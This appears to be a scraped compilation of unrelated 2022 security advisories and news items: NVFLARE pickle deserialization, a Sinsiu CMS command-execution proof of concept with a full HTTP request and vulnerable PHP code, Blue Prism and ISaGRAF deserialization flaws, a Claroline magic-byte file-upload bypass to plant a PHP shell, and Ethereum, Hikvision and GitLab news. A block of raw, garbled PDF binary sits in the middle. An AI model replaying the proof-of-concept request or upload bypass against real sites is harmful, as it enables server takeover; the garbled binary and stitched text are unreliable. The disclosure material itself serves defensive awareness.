NVFLARE, versions prior to 2.1.4, contains a vulnerability that deserialization of Untrusted Data due to Pickle usage may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

**Impact**

NVFLARE contains a vulnerability in its DXO module, where deserialization of Untrusted Data due to Pickle usage may allow an unprivileged network attacker to cause Remote Code Execution, Denial Of Service, and Impact to both Confidentiality and Integrity.

All versions before 2.1.4 are affected.

CVSS Score = 9.8

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Patches**

The patch is included in nvflare==2.1.4  
This new version uses MessagePack instead of Pickle to do serialization and deserialization.

Some object serializations supported by Pickle are not supported by MessagePack. We have provided out of box support for some built-in NVFLARE objects. For object serializations unsupported by MessagePack, the user will need to convert the objects to numpy or bytes before sending over to remote machines. The list of supported object types are listed in https://github.com/NVIDIA/NVFlare/blob/2.1/nvflare/fuel/utils/fobs/README.rst

**Workarounds**

No workarounds available.

**Additional information**

Issue Found by: Oliver Sellwood (Nintorac) and Elias Hohl

CVE-2022-34668: NVFLARE unsafe deserialization due to Pickle

Sinsiu Sinsiu Enterprise Website System v1.1.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /upload/admin.php?/deal/.

中文： 新秀企业网站系统PHP版存在命令执行漏洞 厂商网站地址：http://www.sinsiu.com/ 影响版本： V1.0 下载地址：https://www.lanzoux.com/i8tj53e V1.1 下载地址：http://www.sinsiu.com/ poc： POST /sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/deal/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: \*/\* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 Origin: http://localhost Connection: close Referer: http://localhost/sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/basic/index.html Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2 cmd=phpinfo detail： 负责过滤参数的函数中并没有处理phpinfo； 造成漏洞的函数： V1.0 ------------------------------------------ if(check\_admin\_login() > 0) { if(isset($global\['dir'\])) { include('admin/module/'.$global\['dir'\].'/deal.php'); } $cmd = post('cmd'); $cmd(); } exit(); -------------------------------------------------- function strict($str) { if(S\_MAGIC\_QUOTES\_GPC) { $str = stripslashes($str); } $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('?','&#63;',$str); $str = str\_replace('%','&#37;',$str); $str = str\_replace(chr(39),'&#39;',$str); $str = str\_replace(chr(34),'&#34;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); return $str; } V1.1 ------------------------------------------- if(file\_exists($path)) { include($path); $cmd = post('cmd'); if(function\_exists($cmd)) { $cmd(); exit(); } } --------------------------------------------- function strict($str) { if(get\_magic\_quotes\_gpc()) { $str = stripslashes($str); } $str = str\_replace('&#','{^}',$str); $str = str\_replace('#','&#35;',$str); $str = str\_replace('--','-&#45;',$str); $str = str\_replace('/\*','/&#42;',$str); $str = str\_replace('\*/','&#42;/',$str); $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('(','&#40;',$str); $str = str\_replace(')','&#41;',$str); $str = str\_replace("'",'&#39;',$str); $str = str\_replace('"','&#34;',$str); $str = str\_replace('\\\\','&#92;',$str); $str = str\_replace('%20','&nbsp;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); $str = str\_replace('{^}','&#',$str); return $str; } English: There is a command execution vulnerability in the PHP version of the sinsiu enterprise website system Manufacturer's website address: http://www.sinsiu.com/ Affected version: V1.0 download address: https://www.lanzoux.com/i8tj53e V1.1 download address: http://www.sinsiu.com/ poc： POST /sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/deal/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: \*/\* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 11 Origin: http://localhost Connection: close Referer: http://localhost/sinsiu\_php\_1\_1\_6/sinsiu\_php\_1\_1\_6/upload/admin.php?/basic/index.html Cookie: PHPSESSID=hrjbe20ssnngqee4133k125hb2 cmd=phpinfo detail： phpinfo() is not handled in the function responsible for filtering parameters; Some functions that cause vulnerabilities: V1.0 --------------------------------------------------------- if(check\_admin\_login() > 0) { if(isset($global\['dir'\])) { include('admin/module/'.$global\['dir'\].'/deal.php'); } $cmd = post('cmd'); $cmd(); } exit(); ---------------------------------------------------- function strict($str) { if(S\_MAGIC\_QUOTES\_GPC) { $str = stripslashes($str); } $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('?','&#63;',$str); $str = str\_replace('%','&#37;',$str); $str = str\_replace(chr(39),'&#39;',$str); $str = str\_replace(chr(34),'&#34;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); return $str; } V1.1 ---------------------------------------------------- if(file\_exists($path)) { include($path); $cmd = post('cmd'); if(function\_exists($cmd)) { $cmd(); exit(); } } ---------------------------------------------------------- function strict($str) { if(get\_magic\_quotes\_gpc()) { $str = stripslashes($str); } $str = str\_replace('&#','{^}',$str); $str = str\_replace('#','&#35;',$str); $str = str\_replace('--','-&#45;',$str); $str = str\_replace('/\*','/&#42;',$str); $str = str\_replace('\*/','&#42;/',$str); $str = str\_replace('<','&#60;',$str); $str = str\_replace('>','&#62;',$str); $str = str\_replace('(','&#40;',$str); $str = str\_replace(')','&#41;',$str); $str = str\_replace("'",'&#39;',$str); $str = str\_replace('"','&#34;',$str); $str = str\_replace('\\\\','&#92;',$str); $str = str\_replace('%20','&nbsp;',$str); $str = str\_replace(chr(13).chr(10),'<br />',$str); $str = str\_replace('{^}','&#',$str); return $str; }

CVE-2022-36572: try/SinSiuEnterpriseWebsiteSystem at main · BreakALegCml/try

Key reuse in GoSecure Titan Inbox Detection & Response (IDR) through 2022-04-05 leads to remote code execution. To exploit this vulnerability, an attacker must craft and sign a serialized payload.

%PDF-1.7 %���� 1 0 obj <>/Metadata 74 0 R/ViewerPreferences 75 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/XObject<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 612 792\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��X\[o�0~������>�M\]�\`HC0\*x�x(\]V\*u�h��c��J��M��c;��w�s�W��v2���I<����\[zC��qv�%��O����|9���2���k�ޤ��t5�ӳ���iC(bLB�"\\+j�p�8�J����Ȳ߫^'J�N��^|� �d|��q��É�����<���?2\[�{����nF���뀄\_��m�� ���Ex�j���l֣��\`\\Qa�X=���Db��S�e5���T�F���^�yu� �(s �Wck8�k��0�Rp��׸�i���\]��gY��b�l"�VR��r �����1����\*ť��85�z�}�pqvF��4��" E0��ڍ�2L�;9����Z7��W�2{۞q6 � �U|7���J�Z,#ǒ#���B�gH�7G��e%�0�\*\`\]�$4UO���$Ip��\_$�'u"�/������YȄ���p�V�� c0(|(D�cG�Ň������a�� 2�o�Q�������s>�Dƕ�'�Ւ��$ɨ~J�0�L�X���2wA2�h�a���(�O'.f~� 6��!m�p�� N�#��ݧm�w �rtqF��Y�(�b���y�XZd��e#o�Q{9$q����fc�D'�Q�hl+�jV5{u��>��-��~r.��f��g�q�0mݿ�4��5:���d�Պ�P ʤ=e�l\*���RT����r\] ,Mʧ��Mx,�D��ԥ��o�m��XBy��+!x)��T� #Y4�iڕPe}�TIu��C�E�(ݗ� ς5ZJW�(���F�\`�Z\['������͡U1���$^wD��������Zd+�c�~P�\_��\[�I1{�E��J�d��wxky�)! j���a���Z4�8�����~5\_tD��\_��@j}��@�Z�( x���孮�'�#@-�de@�jD7f\*9v����,����\`�4���z���b�q����vq7����YF���d� endstream endobj 5 0 obj <> endobj 6 0 obj <> endobj 7 0 obj <> endobj 8 0 obj <> endobj 9 0 obj <> endobj 10 0 obj \[ 11 0 R\] endobj 11 0 obj <> endobj 12 0 obj <> endobj 13 0 obj <> endobj 14 0 obj <> endobj 15 0 obj <> endobj 16 0 obj <> endobj 17 0 obj <> endobj 18 0 obj <> endobj 19 0 obj <> endobj 20 0 obj <> stream x��\]�{U��G�nDE��&@�- �H�Wi"H��\*�OD,�/6x� � E�\*H'\[gg���w���$y���dvw�$��s�

CVE-2022-28747

An issue was discovered in Blue Prism Enterprise 6.0 through 7.01. In a misconfigured environment that exposes the Blue Prism Application server, it is possible for a domain authenticated user to send a crafted message to the Blue Prism Server and accomplish a remote code execution attack that is possible because of insecure deserialization. Exploitation of this vulnerability allows for code to be executed in the context of the Blue Prism Server service.

CVE-2022-36119

Rockwell Automation ISaGRAF Workbench software versions 6.0 through 6.6.9 are affected by a Deserialization of Untrusted Data vulnerability. ISaGRAF Workbench does not limit the objects that can be deserialized. This vulnerability allows attackers to craft a malicious serialized object that, if opened by a local user in ISaGRAF Workbench, may result in remote code execution. This vulnerability requires user interaction to be successfully exploited.

CVE-2022-2465

Claroline 13.5.7 and prior is vulnerable to Remote code execution via arbitrary file upload.

**Remote code execution via arbitrary file upload (version : 13.5.7)**

Claroline Connect app presents a RCE vulnerability because of the possibility to upload an arbitrary php file. This vulnerability is present on many upload forms, so I've personnally choosed the resource icon section.

The route **core/Controller/APINew/FileController.php** filters the upload image type by using the getMimeType() function from Symfony :

public function uploadImage(Request $request): JsonResponse
    {
        $files = $request\->files\->all();

        $objects = \[\];
        foreach ($files as $file) {
            if (0 !== strpos($file\->getMimeType(), 'image')) {
                throw new InvalidDataException('Invalid image type.');
            }

            $object = $this\->crud\->create(PublicFile::class, \[\], \['file' => $file, Crud::THROW\_EXCEPTION\]);
            $objects\[\] = $this\->serializer\->serialize($object);
        }

        return new JsonResponse($objects);
    }

It is possible to trick this function by adding some magic bytes like GIF8; which corresponds to the GIF image file type. The mime type image/gif should be also applied.

Then it is possible to get RCE by using the upload php shell :

**Fix suggestions :** Enhance file upload checks by adding real mime type verification (file content, bytes, size, etc).

CVE-2022-37159: claroline-CVEs/rce_file_upload.md at main · matthieu-hackwitharts/claroline-CVEs

Red Hat Security Advisory 2022-6158-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.

Red Hat Security Advisory 2022-6158-01

Eco-friendly upgrade sends bounties soaring as computational demands plummet

Adam Bannister 25 August 2022 at 13:07 UTC

Eco-friendly upgrade sends bounties soaring as computational demands plummet

Bug bounty rewards for the Ethereum blockchain have quadrupled for a two-week period when related to the network’s transition to proof-of-stake.

The application of a fourfold multiplier to payouts means ethical hackers could earn up to $1 million for the submission of valid critical vulnerabilities.

The Ethereum Foundation announced yesterday (August 24) that the bonus would be applied with immediate effect and last until September 8.

**Bellatrix upgrade**

The transition from ‘proof-of-work’ to ‘proof-of-stake’ – a more energy-efficient consensus mechanism for processing transactions – “must first be activated on the Beacon Chain with the Bellatrix upgrade,” said the non-profit organization in a blog post.

“After this, the proof-of-work chain will migrate to proof-of-stake upon hitting a specific Total Difficulty value.”

Read more of the latest bug bounty news

The Bellatrix upgrade is scheduled for September 6, with the Terminal Total Difficulty value triggering the transition – which the Ethereum Foundation has dubbed ‘The Merge’ – expected between September 10-20.

The Ethereum Foundation also confirmed the date for the sunsetting of the Kiln testnet, first announced in June, as September 6. The Kiln testnet was launched in 2022 to provide a post-merge testing environment.

Rinkeby and Ropsten are also set to be deprecated before the end of the year, with users advised to migrate to the Goerli or Sepolia testnets.

As set out in the blockchain’s independently hosted bug bounty program, hackers ordinarily earn up to $250,000 for critical issues, $50,000 for high severity flaws, $10,000 for medium severity vulnerabilities, and $2,000 for low severity bugs.

In scope for the program are specification vulnerabilities such as denial-of-service (DoS) vectors or parameter inconsistencies, client issues like spec non-compliance or remote code execution vulnerabilities, bugs in the solidity repository or third-party dependencies that result in solidity-specific flaws, and flaws related to the Beacon Chain Deposit Contract.

RECOMMENDED Security researchers blast ‘ridiculous’ CrowdStrike bug disclosure practices

Ethereum Foundation offers $1m bug bounty payouts with proof-of-stake migration multiplier

The US Cybersecurity and Infrastructure Security Agency had wanted federal agencies to implement the fix for the RCE flaw in Hikvision cameras by Jan. 24, 2022.

Some 2,300 organizations worldwide — many of them in the United States — remain at risk of major compromise via a known critical remote code execution (RCE) vulnerability in Hikvision IP video cameras that was disclosed last year.

The bug (CVE-2021-36260) is a command injection vulnerability that is present in the Web server of several Hikvision cameras. Attackers can exploit the vulnerability to launch commands that allow them to gain complete root-shell access to an affected device — something that even the owners don't have, according to the researcher that discovered the flaw.

The organizations using the unpatched devices are at risk of network compromise, and potentially even physical attack; attackers could use the zero-click vulnerability to take complete control of affected Hikvision cameras. From there, they could disable them ahead of a physical breach, or use them to breach connected enterprise networks, launch denial-of-service attacks on them, add them to a botnet, steal data, and carry out other malicious actions. 

"This is the highest level of critical vulnerability — a zero click unauthenticated remote code execution (RCE) vulnerability affecting a high number of Hikvision cameras. Connected internal networks at risk," according to the bug report.

The firmware vulnerability was discovered in June 2021 and reported to the hardware vendor, which then issued a patch for it last September. However, close to a year later, tens of thousands of affected devices — whose users include at least some federal civilian agencies — remain unpatched against the vulnerability.

**Hikvision Camera Analysis**

Researchers from Cyfirma recently analyzed a sample of 285,000 Internet-facing Hikvision cameras and found some 80,000 of them that are still open to exploit via the vulnerability. 

The countries with the greatest number of vulnerable devices were China (12,690), the US (10,611), and Vietnam (7,394). Other countries with a sizeable number of vulnerable Hikvision cameras included the United Kingdom, Ukraine, Thailand, and South Africa. The cameras belong to more than 2,300 organizations scattered across these and other countries.

In its vulnerability disclosure last September, Hikvision listed dozens of its products as being impacted by the vulnerability — some going as far back as 2016. The company had urged organizations using affected Hikvision cameras to install updated firmware to patch the flaw and guard against potential attacks targeting the flaw. 

The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2021-36260 to its catalog of known exploited vulnerabilities on Jan. 10 this year, and it required federal agencies using Hikvision cameras to install the firmware updates by Jan. 24.

According to Cyfirma, nearly a year after the flaw was disclosed, attacker interest in it remains high. The security vendor said it had observed multiple instances where threat actors sought to collaborate with each other to exploit the flaw.

"Specifically in the Russian forums, we have observed leaked credentials of Hikvision camera products available for sale," Cyfirma said. "These can be leveraged by hackers to gain access to the devices and exploit further the path of attack to target an organization's environment." Cyfirma noted it has reason to believe that a few Chinese threats actors, including APT41 and APT10, are also looking to exploit the vulnerability to breach target networks where possible.

In a blog post this week, security vendor Malwarebytes noted that adversaries have few obstacles to exploitation given several proofs-of-concept that have been published. These include a potential exploit for it that was published on Packet Storm last October; a Metasploit module based on CVE-2021-36260 that Packet Storm published this February; and reports of a Mira botnet variant called Moobot that was spreading via the Hikvision vulnerability. 

"Given the amount of available information, it is trivial even for a 'copy and paste criminal' to make use of the unpatched cameras," Malwarebytes warned.

The researcher who discovered the flaw — who goes by the handle "Watchful\_IP" — described the vulnerability as trivial to exploit, giving attackers the ability to take complete remote control of Hikvision cameras simply by accessing the camera's http(s) server port, which usually is 80/443.

"No username or password \[is\] needed, nor any actions need to be initiated by the camera owner," the security researcher observed in his initial vulnerability disclosure last year. "It will not be detectable by any logging on the camera itself."

Vulnerabilities in IoT devices — which can be anything from video cameras and building management systems to critical Internet-connected systems in medical, industrial control systems (ICS), and operational technology (OT) networks — present a growing challenge for enterprise organizations. A new report from Claroty this week noted a 57% year-over-year increase in vulnerability disclosures involving IoT products. 

The security vendor's study showed that for the first time the percentage of disclosed firmware vulnerabilities, like the one in Hikvision cameras, was nearly the same as the percentage of software vulnerabilities — 46% vs. 48%. In addition, the combined number of IoT vulnerabilities and vulnerabilities in medical IoT devices exceeded IT vulnerabilities for the first time as well. Claroty noted: "This indicates enhanced understanding on the part of vendors and researchers to secure these connected devices as they can be a gateway to deeper network penetration."

Thousands of Organizations Remain at Risk From Critical Zero-Click IP Camera Bug

Categories: Exploits and vulnerabilities
Categories: News
Tags: GitLab

Tags:  RCE

Tags:  CVE-2022-2884

Tags:  GitHub

Tags:  import

GitLab has released important security fixes to patch for an RCE vulnerability, known as CVE-2022-2884.



(Read more...)




The post Update now! GitLab issues critical security release for RCE vulnerability appeared first on Malwarebytes Labs.

GitLab has released versions 15.3.1, 15.2.3, 15.1.5 for GitLab Community Edition (CE) and Enterprise Edition (EE). These versions contain important security fixes, and it’s recommended that all GitLab installations be upgraded to one of these versions immediately. GitLab.com is already running the patched version.

**GitLab**

GitLab and GitHub are open-source code repository platforms allowing anyone to collaborate on projects. GitLab focuses on providing tools for teams working on software development projects (repositories), while GitHub focuses more on managing the workflow of individual developers and organizations. The name GitLab was chosen because it combines GitHub and Lighthouse (the company that develops the source code management system).

GitLab has millions of users worldwide. Since no specific deployment type (omnibus, source code, helm chart, etc.) is mentioned in the release, this means all types are affected.

**RCE vulnerability**

The main reason to apply this security update as soon as possible is CVE-2022-2884, a Remote Command Execution (RCE) vulnerability in Github import. The vulnerability’s severity was given a CVSS score of 9.9 out of 10.

The vulnerability in GitLab CE/EE affects all versions starting from 11.3.4 before 15.1.5, all versions starting from 15.2 before 15.2.3, all versions starting from 15.3 before 15.3.1. The flaw allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. By making use of this vulnerability, a threat actor could take control over the server, steal or delete source code, perform malicious commits, and more.

**Mitigation**

Users are advised to upgrade to the latest security release for their supported version. To update GitLab, see the GitLab update page.

If you're unable to update right away, you can secure your GitLab installation against this vulnerability using the workaround outlined below until you have time to upgrade.

**Disable GitHub import**

Login using an administrator account to your GitLab installation and perform the following:

*   Click "Menu" -> "Admin".
*   Click "Settings" -> "General".
*   Expand the "Visibility and access controls" tab.
*   Under "Import sources" disable the "GitHub" option.
*   Click "Save changes".

**Verifying the workaround**

*   In a browser window, login as any user.
*   Click "+" on the top bar.
*   Click "New project/repository".
*   Click "Import project".
*   Verify that "GitHub" does not appear as an import option.

Tag

#rce